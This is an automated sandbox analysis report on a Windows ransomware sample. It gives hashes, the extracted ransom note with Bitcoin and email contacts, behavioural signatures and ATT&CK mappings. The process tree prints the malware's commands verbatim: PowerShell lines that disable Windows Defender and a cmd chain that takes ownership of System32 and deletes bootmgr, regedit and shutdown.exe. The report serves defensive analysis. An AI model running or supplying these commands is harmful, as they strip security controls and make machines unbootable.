Analysis

  • max time kernel
    139s
  • max time network
    52s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    20-09-2022 05:03

General

  • Target

    UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe

  • Size

    4.4MB

  • MD5

    a83040b851cf14288d3262d2bd4460fc

  • SHA1

    bac8269c66d5b0ca2c5487eb3366c910c99a67e1

  • SHA256

    ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1

  • SHA512

    89848ac37b274bcdf55cbba3b0dd46013de75563a95ed197d42269a2c1c3c2f62c935f24e8db2a912d5cbfd808575dff12d9141eaea3b103cc4bb7707b1cda8e

  • SSDEEP

    98304:6MNbfTJlGuc3B57vYT8A7X27aKc736CtbL8RdwZkid1W5:nN7tvcjUT8A7X219uKdw2B

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\DECRYPT-FILES.TXT

Ransom Note
Ooops! All your important files are encrypted! [+] What happend to my computer? [+] All your important files are encrypted. No one can help you to restore files without our special decryptor. Backups were either encrypted or deleted. Shadow copies also removed. If you want to restore some of your files for free write to email (contact is below) and attach 2-3 encrypted files. You will receive decrypted samples. To decrypt other files you have to pay $250. [+] How do i pay? [+] Payment is accepted in Bitcoin only. Please check the current price of Bitcoin and buy some Bitcoins. And send the correct amount to the address specified at the bottom. [+] How can i contact? [+] 1.Download Tor browser (https://www.torproject.org/) 2.Create account on mail2tor (http://mail2tor2zyjdctd.onion/) 3.Write email to us (CobraLocker@mail2tor.com) If you can't use tor in your country you can write to us on our temporary email address. [+] What if i already paid? [+] Send your Bitcoin wallet ID to e-mail provided above. Attention! 1.Do not modify encrypted files. 2.Do not try decrypt your data using third party software. 3.Do not turn off your computer. Our bitcoin address: bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe Our temporary e-mail address: f64dfn9pbhybaqfrh5dp65jrzcg@protonmail.com
Emails

CobraLocker@mail2tor.com

f64dfn9pbhybaqfrh5dp65jrzcg@protonmail.com

URLs

http://mail2tor2zyjdctd.onion/

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Maze

    Ransomware family also known as ChaCha.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Disables Task Manager via registry modification
  • Executes dropped EXE 1 IoCs
  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Possible privilege escalation attempt 5 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Modifies file permissions 1 TTPs 5 IoCs
  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of WriteProcessMemory 40 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe
    "C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1992
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1492
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent NeverSend
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1712
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting Disable
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1312
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1476
    • C:\Users\Admin\AppData\Local\Temp\VSSVC.exe
      "C:\Users\Admin\AppData\Local\Temp\VSSVC.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Executes dropped EXE
      • Modifies extensions of user files
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:832
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && takeown /f C:\Windows\System32\shutdown.exe && icacls C:\Windows\System32\shutdown.exe /grant %username%:F && del C:\Windows\System32\shutdown.exe && Exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:772
        • C:\Windows\SysWOW64\takeown.exe
          takeown /f C:\Windows\System32
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:108
        • C:\Windows\SysWOW64\icacls.exe
          icacls C:\Windows\System32 /grant Admin:F
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:540
        • C:\Windows\SysWOW64\takeown.exe
          takeown /f C:\Windows\System32\drivers
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:1772
        • C:\Windows\SysWOW64\icacls.exe
          icacls C:\Windows\System32\drivers /grant Admin:F
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1408
        • C:\Windows\SysWOW64\takeown.exe
          takeown /f C:\Windows\System32\LogonUI.exe
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:1796

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Virtualization/Sandbox Evasion

1
T1497

File Permissions Modification

1
T1222

Discovery

Query Registry

2
T1012

Virtualization/Sandbox Evasion

1
T1497

System Information Discovery

3
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\VSSVC.exe
    Filesize

    3.1MB

    MD5

    e4f24d91d8e7290ffd6afc8aa01c6d63

    SHA1

    b552c6af33cc5a62379028687924406cba8ff74d

    SHA256

    5eb371a9cf91b981502d3ee26880b8c15f62b3eeaaa2484d523a2a03a233bebb

    SHA512

    ae0d0c2494b0a4753039f4fdf6a589848a44a386b759511aab9374e9446f84c39895ec2c9d00ed0ce3df07663a9f14e2f21f42a85966336b0e35204da0d82e00

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    fb8901bfb5eb8b5cd51c393f6e11ea2e

    SHA1

    659d7e2e79485eb006372ff061fdffe0961f5e43

    SHA256

    bfc1cb93abb78c50cf8a280d440551adbfba9ca138be5aa472cbdab95f05f209

    SHA512

    82e6d79b836fae138c00c47242318b4a8b3c981bc71c431c1bd4062b08287a7a1f7a6667becb58b9ca5525f999efb20e15655f585982748536fb09f5df8c8e49

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    fb8901bfb5eb8b5cd51c393f6e11ea2e

    SHA1

    659d7e2e79485eb006372ff061fdffe0961f5e43

    SHA256

    bfc1cb93abb78c50cf8a280d440551adbfba9ca138be5aa472cbdab95f05f209

    SHA512

    82e6d79b836fae138c00c47242318b4a8b3c981bc71c431c1bd4062b08287a7a1f7a6667becb58b9ca5525f999efb20e15655f585982748536fb09f5df8c8e49

  • memory/108-105-0x0000000000000000-mapping.dmp
  • memory/540-106-0x0000000000000000-mapping.dmp
  • memory/772-104-0x0000000000000000-mapping.dmp
  • memory/832-70-0x0000000000280000-0x0000000000AF4000-memory.dmp
    Filesize

    8.5MB

  • memory/832-76-0x00000000770A0000-0x0000000077220000-memory.dmp
    Filesize

    1.5MB

  • memory/832-68-0x0000000000000000-mapping.dmp
  • memory/832-87-0x0000000000280000-0x0000000000AF4000-memory.dmp
    Filesize

    8.5MB

  • memory/832-86-0x0000000000280000-0x0000000000AF4000-memory.dmp
    Filesize

    8.5MB

  • memory/832-71-0x0000000075281000-0x0000000075283000-memory.dmp
    Filesize

    8KB

  • memory/832-72-0x0000000000280000-0x0000000000AF4000-memory.dmp
    Filesize

    8.5MB

  • memory/1312-58-0x0000000000000000-mapping.dmp
  • memory/1312-99-0x000000000253B000-0x000000000255A000-memory.dmp
    Filesize

    124KB

  • memory/1312-98-0x0000000002534000-0x0000000002537000-memory.dmp
    Filesize

    12KB

  • memory/1312-73-0x000007FEEC170000-0x000007FEECB93000-memory.dmp
    Filesize

    10.1MB

  • memory/1312-92-0x000000000253B000-0x000000000255A000-memory.dmp
    Filesize

    124KB

  • memory/1312-91-0x000000001B950000-0x000000001BC4F000-memory.dmp
    Filesize

    3.0MB

  • memory/1312-81-0x000007FEEB610000-0x000007FEEC16D000-memory.dmp
    Filesize

    11.4MB

  • memory/1312-85-0x0000000002534000-0x0000000002537000-memory.dmp
    Filesize

    12KB

  • memory/1408-108-0x0000000000000000-mapping.dmp
  • memory/1476-96-0x0000000002864000-0x0000000002867000-memory.dmp
    Filesize

    12KB

  • memory/1476-97-0x000000000286B000-0x000000000288A000-memory.dmp
    Filesize

    124KB

  • memory/1476-59-0x0000000000000000-mapping.dmp
  • memory/1476-77-0x000007FEEC170000-0x000007FEECB93000-memory.dmp
    Filesize

    10.1MB

  • memory/1476-94-0x000000000286B000-0x000000000288A000-memory.dmp
    Filesize

    124KB

  • memory/1476-78-0x000007FEEB610000-0x000007FEEC16D000-memory.dmp
    Filesize

    11.4MB

  • memory/1476-89-0x000000001B860000-0x000000001BB5F000-memory.dmp
    Filesize

    3.0MB

  • memory/1476-82-0x0000000002864000-0x0000000002867000-memory.dmp
    Filesize

    12KB

  • memory/1492-102-0x00000000024B4000-0x00000000024B7000-memory.dmp
    Filesize

    12KB

  • memory/1492-88-0x000000001B740000-0x000000001BA3F000-memory.dmp
    Filesize

    3.0MB

  • memory/1492-66-0x000007FEEC170000-0x000007FEECB93000-memory.dmp
    Filesize

    10.1MB

  • memory/1492-93-0x00000000024BB000-0x00000000024DA000-memory.dmp
    Filesize

    124KB

  • memory/1492-79-0x000007FEEB610000-0x000007FEEC16D000-memory.dmp
    Filesize

    11.4MB

  • memory/1492-83-0x00000000024B4000-0x00000000024B7000-memory.dmp
    Filesize

    12KB

  • memory/1492-56-0x0000000000000000-mapping.dmp
  • memory/1492-103-0x00000000024BB000-0x00000000024DA000-memory.dmp
    Filesize

    124KB

  • memory/1712-101-0x000000000268B000-0x00000000026AA000-memory.dmp
    Filesize

    124KB

  • memory/1712-100-0x0000000002684000-0x0000000002687000-memory.dmp
    Filesize

    12KB

  • memory/1712-90-0x000000001B840000-0x000000001BB3F000-memory.dmp
    Filesize

    3.0MB

  • memory/1712-64-0x000007FEEC170000-0x000007FEECB93000-memory.dmp
    Filesize

    10.1MB

  • memory/1712-80-0x000007FEEB610000-0x000007FEEC16D000-memory.dmp
    Filesize

    11.4MB

  • memory/1712-95-0x000000000268B000-0x00000000026AA000-memory.dmp
    Filesize

    124KB

  • memory/1712-57-0x0000000000000000-mapping.dmp
  • memory/1712-84-0x0000000002684000-0x0000000002687000-memory.dmp
    Filesize

    12KB

  • memory/1772-107-0x0000000000000000-mapping.dmp
  • memory/1796-109-0x0000000000000000-mapping.dmp
  • memory/1992-54-0x0000000000EA0000-0x0000000001316000-memory.dmp
    Filesize

    4.5MB

  • memory/1992-55-0x000007FEFB741000-0x000007FEFB743000-memory.dmp
    Filesize

    8KB